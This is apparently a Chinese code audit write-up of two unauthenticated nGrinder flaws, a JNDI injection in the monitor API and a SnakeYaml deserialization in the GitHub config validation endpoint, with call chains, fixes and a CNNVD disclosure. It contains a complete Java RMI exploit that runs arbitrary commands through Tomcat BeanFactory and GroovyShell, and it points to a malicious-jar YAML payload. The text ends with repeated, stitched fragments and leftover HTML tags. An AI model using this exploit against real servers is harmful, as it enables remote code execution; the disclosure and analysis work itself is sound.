nGrinder 代码审计报告：未授权JNDI注入与SnakeYaml反序列化漏洞分析<\/h1>

1. 授权机制分析<\/h2>

nGrinder使用Spring Security的@PreAuthorize<\/code>注解进行权限校验，但存在以下特点：<\/p>


控制器函数参数包含User<\/code>实体类时会自动进行权限校验<\/li>
StatisticsApiController<\/code>和UserSignUpApiController<\/code>默认不开启授权检查<\/li>
审计发现两个高危未授权漏洞接口<\/li>
<\/ul>
2. 未授权JNDI注入漏洞<\/h2>
2.1 漏洞位置<\/h3>
org.ngrinder.agent.controller.MonitorManagerApiController#getRealTimeMonitorData<\/code><\/p>
2.2 漏洞调用链<\/h3>

入口方法接收可控的ip<\/code>参数：<\/li>
<\/ol>
public<\/span> SystemDataModel getRealTimeMonitorData<\/span>(<\/span>@RequestParam<\/span> final<\/span> String ip)<\/span> 
<\/span><\/span>    throws<\/span> InterruptedException,<\/span> ExecutionException,<\/span> TimeoutException {<\/span>
<\/span><\/span>    int<\/span> port =<\/span> config.<\/span>getMonitorPort<\/span>();<\/span>
<\/span><\/span>    Future<<\/span>SystemInfo><\/span> systemInfoFuture =<\/span> AopUtils.<\/span>proxy<\/span>(<\/span>this<\/span>).<\/span>getAsyncSystemInfo<\/span>(<\/span>ip,<\/span> port);<\/span>
<\/span><\/span>    SystemInfo systemInfo =<\/span> checkNotNull(<\/span>systemInfoFuture.<\/span>get<\/span>(<\/span>2<\/span>,<\/span> TimeUnit.<\/span>SECONDS<\/span>),<\/span> 
<\/span><\/span>        "Monitoring data is not available."<\/span>);<\/span>
<\/span><\/span>    return<\/span> new<\/span> SystemDataModel(<\/span>systemInfo,<\/span> "UNKNOWN"<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
调用getAsyncSystemInfo<\/code>方法：<\/li>
<\/ol>
public<\/span> Future<<\/span>SystemInfo><\/span> getAsyncSystemInfo<\/span>(<\/span>String ip,<\/span> int<\/span> port)<\/span> {<\/span>
<\/span><\/span>    return<\/span> new<\/span> AsyncResult<>(<\/span>monitorInfoStore.<\/span>getSystemInfo<\/span>(<\/span>ip,<\/span> port));<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
进入MonitorInfoStore.getSystemInfo<\/code>：<\/li>
<\/ol>
public<\/span> SystemInfo getSystemInfo<\/span>(<\/span>String ip,<\/span> int<\/span> port)<\/span> {<\/span>
<\/span><\/span>    MonitorClientService monitorClient =<\/span> monitorClientMap.<\/span>get<\/span>(<\/span>ip);<\/span>
<\/span><\/span>    if<\/span> (<\/span>monitorClient ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        monitorClient =<\/span> new<\/span> MonitorClientService(<\/span>ip,<\/span> port);<\/span>
<\/span><\/span>        monitorClient.<\/span>init<\/span>();<\/span>
<\/span><\/span>        IOUtils.<\/span>closeQuietly<\/span>(<\/span>monitorClientMap.<\/span>put<\/span>(<\/span>ip,<\/span> monitorClient));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    monitorClient.<\/span>update<\/span>();<\/span>
<\/span><\/span>    monitorClient.<\/span>setLastAccessedTime<\/span>(<\/span>System.<\/span>currentTimeMillis<\/span>());<\/span>
<\/span><\/span>    return<\/span> monitorClient.<\/span>getSystemInfo<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
MonitorClientService.init()<\/code>创建MBeanClient<\/code>：<\/li>
<\/ol>
public<\/span> void<\/span> init<\/span>()<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        mBeanClient =<\/span> new<\/span> MBeanClient(<\/span>ip,<\/span> port);<\/span>
<\/span><\/span>        mBeanClient.<\/span>connect<\/span>();<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>        LOGGER.<\/span>info<\/span>(<\/span>"Monitor Connection Error to {} by {}"<\/span>,<\/span> ip +<\/span> ":"<\/span> +<\/span> port,<\/span> e.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
MBeanClient.connect()<\/code>最终调用JMXConnectorFactory.connect(jmxUrl)<\/code>：<\/li>
<\/ol>
private<\/span> JMXConnector connectWithTimeout<\/span>(<\/span>final<\/span> JMXServiceURL jmxUrl,<\/span> int<\/span> timeout)<\/span> 
<\/span><\/span>    throws<\/span> NGrinderRuntimeException,<\/span> TimeoutException {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        ExecutorService executor =<\/span> Executors.<\/span>newSingleThreadExecutor<\/span>();<\/span>
<\/span><\/span>        Future<<\/span>JMXConnector><\/span> future =<\/span> executor.<\/span>submit<\/span>(()<\/span> -><\/span> JMXConnectorFactory.<\/span>connect<\/span>(<\/span>jmxUrl));<\/span>
<\/span><\/span>        return<\/span> future.<\/span>get<\/span>(<\/span>timeout,<\/span> TimeUnit.<\/span>MILLISECONDS<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>TimeoutException e)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> e;<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> processException(<\/span>e);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
关键漏洞点 - JNDI查找：<\/li>
<\/ol>
private<\/span> RMIServer findRMIServerJNDI<\/span>(<\/span>String jndiURL,<\/span> Map<<\/span>String,<\/span> ?><\/span> env)<\/span> 
<\/span><\/span>    throws<\/span> NamingException {<\/span>
<\/span><\/span>    InitialContext ctx =<\/span> new<\/span> InitialContext(<\/span>EnvHelp.<\/span>mapToHashtable<\/span>(<\/span>env));<\/span>
<\/span><\/span>    Object objref =<\/span> ctx.<\/span>lookup<\/span>(<\/span>jndiURL);<\/span>  \/\/ jndiURL可控导致JNDI注入
<\/span><\/span><\/span><\/span>    ctx.<\/span>close<\/span>();<\/span>
<\/span><\/span>    return<\/span> narrowJRMPServer(<\/span>objref);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 高版本JDK利用方法<\/h3>
nGrinder环境包含Tomcat和Groovy包，可绕过JDK高版本限制：<\/p>
import<\/span> com.sun.jndi.rmi.registry.ReferenceWrapper;<\/span>
<\/span><\/span>import<\/span> org.apache.naming.ResourceRef;<\/span>
<\/span><\/span>import<\/span> javax.naming.StringRefAddr;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Exploit<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String args[])<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        int<\/span> port =<\/span> Integer.<\/span>parseInt<\/span>(<\/span>args[<\/span>0<\/span>]);<\/span>
<\/span><\/span>        String cmd =<\/span> args[<\/span>1<\/span>];<\/span>
<\/span><\/span>        
<\/span><\/span>        Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>port);<\/span>
<\/span><\/span>        ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"groovy.lang.GroovyShell"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> 
<\/span><\/span>            true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=evaluate"<\/span>));<\/span>
<\/span><\/span>        String script =<\/span> String.<\/span>format<\/span>(<\/span>"'%s'.execute()"<\/span>,<\/span> cmd);<\/span>
<\/span><\/span>        ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> script));<\/span>
<\/span><\/span>        
<\/span><\/span>        ReferenceWrapper referenceWrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>ref);<\/span>
<\/span><\/span>        registry.<\/span>bind<\/span>(<\/span>"rmi:\/\/0.0.0.0:13243\/jmxrmi"<\/span>,<\/span> referenceWrapper);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 未授权SnakeYaml反序列化漏洞<\/h2>
3.1 漏洞位置<\/h3>
org.ngrinder.script.controller.FileEntryApiController#validateGithubConfig<\/code><\/p>
3.2 漏洞分析<\/h3>

未授权接口：<\/li>
<\/ol>
@PostMapping<\/span>(<\/span>"\/github\/validate"<\/span>)<\/span>
<\/span><\/span>public<\/span> void<\/span> validateGithubConfig<\/span>(<\/span>@RequestBody<\/span> FileEntry fileEntry)<\/span> {<\/span>
<\/span><\/span>    gitHubFileEntryService.<\/span>validate<\/span>(<\/span>fileEntry);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
调用GitHubFileEntryService.validate<\/code>：<\/li>
<\/ol>
public<\/span> boolean<\/span> validate<\/span>(<\/span>FileEntry gitConfigYaml)<\/span> {<\/span>
<\/span><\/span>    for<\/span> (<\/span>GitHubConfig config :<\/span> getAllGithubConfig(<\/span>gitConfigYaml))<\/span> {<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
关键漏洞点 - Yaml反序列化：<\/li>
<\/ol>
private<\/span> Set<<\/span>GitHubConfig><\/span> getAllGithubConfig<\/span>(<\/span>FileEntry gitConfigYaml)<\/span> {<\/span>
<\/span><\/span>    Set<<\/span>GitHubConfig><\/span> gitHubConfig =<\/span> new<\/span> HashSet<>();<\/span>
<\/span><\/span>    Yaml yaml =<\/span> new<\/span> Yaml();<\/span>
<\/span><\/span>    Iterable<<\/span>Map<<\/span>String,<\/span> Object>><\/span> gitConfigs =<\/span> cast(<\/span>yaml.<\/span>loadAll<\/span>(<\/span>gitConfigYaml.<\/span>getContent<\/span>()));<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
反序列化调用链：<\/li>
<\/ol>

yaml.loadAll()<\/code> → BaseConstructor.getData()<\/code> → constructDocument()<\/code><\/li>
最终会实例化javax.script.ScriptEngineManager<\/code>并利用SPI机制加载恶意类<\/li>
<\/ul>
3.3 漏洞利用<\/h3>
使用ScriptEngineManager通过URL加载恶意jar包，可利用yaml-payload<\/a>项目生成payload。<\/p>
4. 修复建议<\/h2>


JNDI注入修复<\/strong>：<\/p>

对MonitorManagerApiController.getRealTimeMonitorData<\/code>方法添加权限校验<\/li>
对输入的ip<\/code>参数进行严格过滤<\/li>
升级JDK版本并设置com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li>
<\/ul>
<\/li>

SnakeYaml反序列化修复<\/strong>：<\/p>

对validateGithubConfig<\/code>方法添加权限校验<\/li>
使用SafeConstructor限制Yaml反序列化：
Yaml yaml =<\/span> new<\/span> Yaml(<\/span>new<\/span> SafeConstructor());<\/span>
<\/span><\/span><\/code><\/pre><\/li>
对用户输入的Yaml内容进行严格校验<\/li>
<\/ul>
<\/li>

通用建议：<\/p>

对所有接口进行权限校验<\/li>
更新依赖库到最新安全版本<\/li>
实施输入验证和输出编码<\/li>
<\/ul>
<\/li>
<\/ol>
5. 漏洞状态<\/h2>
以上漏洞已提交CNNVD并确认通过。<\/p>

nGrinder 代码审计报告：未授权JNDI注入与SnakeYaml反序列化漏洞分析<\/h1>

2. 未授权JNDI注入漏洞<\/h2>

2.1 漏洞位置<\/h3>
`org.ngrinder.agent.controller.MonitorManagerApiController#getRealTimeMonitorData<\/code><\/p>`

3. 未授权SnakeYaml反序列化漏洞<\/h2>

3.1 漏洞位置<\/h3>
`org.ngrinder.script.controller.FileEntryApiController#validateGithubConfig<\/code><\/p>`

3.3 漏洞利用<\/h3>
使用ScriptEngineManager通过URL加载恶意jar包，可利用yaml-payload<\/a>项目生成payload。<\/p>

5. 漏洞状态<\/h2>
以上漏洞已提交CNNVD并确认通过。<\/p>

nGrinder 代码审计报告：未授权JNDI注入与SnakeYaml反序列化漏洞分析<\/h1>

2. 未授权JNDI注入漏洞<\/h2>

2.1 漏洞位置<\/h3> org.ngrinder.agent.controller.MonitorManagerApiController#getRealTimeMonitorData<\/code><\/p>

3. 未授权SnakeYaml反序列化漏洞<\/h2>

3.1 漏洞位置<\/h3> org.ngrinder.script.controller.FileEntryApiController#validateGithubConfig<\/code><\/p>

3.3 漏洞利用<\/h3> 使用ScriptEngineManager通过URL加载恶意jar包，可利用yaml-payload<\/a>项目生成payload。<\/p>

5. 漏洞状态<\/h2> 以上漏洞已提交CNNVD并确认通过。<\/p>

2.1 漏洞位置<\/h3>
`org.ngrinder.agent.controller.MonitorManagerApiController#getRealTimeMonitorData<\/code><\/p>`

3.1 漏洞位置<\/h3>
`org.ngrinder.script.controller.FileEntryApiController#validateGithubConfig<\/code><\/p>`

3.3 漏洞利用<\/h3>
使用ScriptEngineManager通过URL加载恶意jar包，可利用yaml-payload<\/a>项目生成payload。<\/p>

5. 漏洞状态<\/h2>
以上漏洞已提交CNNVD并确认通过。<\/p>